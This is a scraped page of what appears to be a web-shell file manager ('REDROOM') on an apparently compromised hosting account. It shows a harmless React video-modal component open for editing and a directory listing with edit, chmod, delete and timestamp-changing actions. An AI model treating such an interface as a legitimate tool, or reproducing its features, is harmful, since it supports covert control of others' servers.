REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 932 B
Close
//proc/thread-self/root/home/byroehnu/easetack.com/resources/js/Frontend/Components/VideoModal/Video3.jsx
Text
Base64
import VideoModal from "." export default function Video3({ data }) { const { section_title, background_image_url, video_url } = data return ( <> {section_title && ( <div className="container"> <div className="cs_section_heading cs_style_1 text-center"> <h2 className="cs_section_title cs_fs_53 cs_normal mb-0" dangerouslySetInnerHTML={{ __html: section_title }} /> </div> <div className="cs_height_85 cs_height_lg_50" /> </div> )} <div className="container"> <VideoModal videoSrc={video_url} imageUrl={background_image_url} className="cs_size_lg_1 cs_radius_200_0" /> </div> </> ) }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 4
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
index.jsx
2.59 KB
lrw-rw-rw-
2025-04-22 07:42:55
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Video1.jsx
852 B
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Video2.jsx
999 B
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Video3.jsx
932 B
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).